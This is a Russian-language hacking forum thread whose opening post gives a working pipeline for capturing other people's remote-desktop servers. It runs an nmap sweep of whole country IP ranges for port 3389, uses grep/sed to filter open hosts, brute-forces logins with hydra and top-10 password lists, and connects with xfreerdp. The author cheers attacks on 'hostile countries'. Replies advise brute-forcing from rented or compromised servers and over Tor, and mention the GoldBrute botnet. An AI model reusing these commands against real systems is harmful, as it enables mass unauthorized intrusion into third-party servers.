• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья В поисках лучшего алгоритма по захвату дедиков в 2К18

CYBERSATORI EXPERIENCE 4 CAPTURE DEDICATED SERVERS ON LINUX SYSTEM // Мой опыт захвата дэдиксов с Лилы

CREATE NMAP SCRIPT FILE (Input All Major-IP Blocks of any Country here): // Оборачиваем следующие пару строк в скрипт, создаём пару txt-шек
http://www.ipdeny.com/ipblocks/ здесь можно посмотреть списки ипи-блоков по интересующей стране, но если воткнёте в подскан все разом, результаты придут к следующему году, так что не жадничаем и по-немножку сканим интересующую подсеть. Ведём журнал, записываем в блокнотик исследованые диапазоны.
Код:
c='Path/To/Your/Script/Here'
nmap -sS -p3389 -PS3389 -oG $c/scannedOnlineServers.txt -iL $c/hostsIPRange.txt -vv
CREATE PARSER FILE (to select only OK IP's list): // создаём сортировочную машинку которая извлечёт нам ипишки с открытым RDP портом.
Код:
p='/Path/To/Your/Script/Here'
grep -E '/open/' $p/scannedOnlineServers.txt | sed 's/Host: //' > $p/scanGhostFile.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -u > $p/openedServers.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -d » $p/openedServers.txt
rm $p/scanGhostFile.txt
PUT HYDRA COMAND (Best 4 Brute on Linux or use Metasploit experience): //ничего веселее гидры не нашлось, crowbar даёт ложные пробои и станится, поэтому загружаем пару топ-10 словарей (admin - password) и берём так сказать количеством, гидра хороша тем что не сильно нагружает процессор и в фоновом режиме может брутить сутки на пролёт не сильно задевая чувства верующих. В идеале думаю полезно разобраться и эксплойтить отсортированые ипишечки с Metasploit - но это уже тема для другой статьи, так как быстрых стандартных решений этого вопроса я пока не вижу.
Код:
hydra -L (loginTop10listHere) -P (passTop10listHere) -M (openedServersHere) -vV -o (SavedOKServers) rdp
TO CONTROL REMOTE DESKTOP : // входим в сбрученые оболочки и получаем профит
Код:
xfreerdp /u:LOGIN /p: PASSWORD /v:IP:3389
Так же предлагаю обсудить моё творчество, может у кого есть мысли на более рациональные варианты, пролистав весь рунет путнего по сабжу ничего не нашёл, решил выступить на данной конференции со своим мини-докладом. Всем спасибо за потраченое на мою статью время. Любая ваша критика, любые доводы уместны, но не обязательно будут приняты к рассмотрению. Удачных пробоев товарищи хэккерсы. Похороним экономику враждебно настроеных стран. Мы Анонисты - мы Легион! Так же отвечу на любые ньюби вопросы, если кто запутался в моей партянке.

6a472f3a81494f6d8a7a384181e85229.png
 
Последнее редактирование модератором:
К

Коник67

Дети есть) но к жене есть вопросы)
 
L

Langolier

Дети есть) но к жене есть вопросы)
Чувак, тебе к психологу нужно.
Поверь, даже прочитав переписку жены мы тебе ничем не поможем.
Ты не станешь счастливее.
Жену любить надо, чтобы с любовниками не переписывалась.
А если нет любви - уходи. Или её отпусти.
Так всем лучше будет.

Будь умнее, будь мужчиной.
Не нужна тебе её переписка.
 
L

Langolier

ну хз ну не на столько грязное )
Зачем тебе это VT ?
Ты собрался брутить с домашней хостовой машины ?
Не нужно этого делать.
Установи программу в виртуальную Windows и не задумывайся о VT.
Неплохо было-бы ещё и к VPN-серверу подключиться.

Но лучше брутить с дедика.
Преимущества очевидны: ни вирусы не беспокоят, ни электричество не тратится, свой комп не занят.

Могу выложить вот с таким VT.
 

krypt0n

Green Team
12.11.2017
139
68
BIT
0
Зачем тебе это VT ?
Ты собрался брутить с домашней хостовой машины ?
Не нужно этого делать.
Установи программу в виртуальную Windows и не задумывайся о VT.
Неплохо было-бы ещё и к VPN-серверу подключиться.

Но лучше брутить с дедика.
Преимущества очевидны: ни вирусы не беспокоят, ни электричество не тратится, свой комп не занят.

Могу выложить вот с таким VT.
деда нету машина не потянет вирту под брут
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
а

по подробней можно как то подсказать?
Покупаешь сервер на "VDS или VPS" (впринципе это одно и тоже), либо покупаешь "дедик", либо добываешь что нибудь из перечисленного любым другим способом. И туда уже устанавливаешь программы для брута и брутишь...
 
  • Нравится
Реакции: Johnnnnnnnn и DefWolf
K

Kupe

Покупаешь сервер на "VDS или VPS" (впринципе это одно и тоже), либо покупаешь "дедик", либо добываешь что нибудь из перечисленного любым другим способом. И туда уже устанавливаешь программы для брута и брутишь...
понял спс
 

Bypass

Green Team
02.02.2018
451
579
BIT
0
Последнее редактирование:
K

Kupe

После того как побрутил, в 4 утра ставишь будильник и ждешь гостей в масках, на чай )
Анон на уровень крути если хацкер мамкин ты. © Йода
через тор брутю))) так что не ко мне в масках а на кого бог пошлет
 

krypt0n

Green Team
12.11.2017
139
68
BIT
0
После того как побрутил, в 4 утра ставишь будильник и ждешь гостей в масках, на чай )
Анон на уровень крути если хацкер мамкин ты. © Йода
хахахахахахахах боже боже , что ты несешь! гостей та еще и в масках ахахах
 

darklight

Green Team
18.10.2018
45
72
BIT
1
А потом смотрю я лог своего vps, а там попытки подключения к шелу, почте и скан портов почти каждую секунду :)
 

Buba

New member
18.11.2019
1
0
BIT
0
Приветствую всех как правильно сотавлять пароли для брут Z668
 

Gashan1980

One Level
20.01.2020
1
1
BIT
0
Кому интересно - есть такой ботнет GOLDBRUTE, он заражает винду и ищет дедики. После того, как нашёл штук 80 - отправляет на заражённые машины каждая из кторых брутфорсит одной комбинацией. Интересная штукенция, можетет гугольнуть если заинтерисовало=)
 
  • Нравится
Реакции: Mitistofel
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!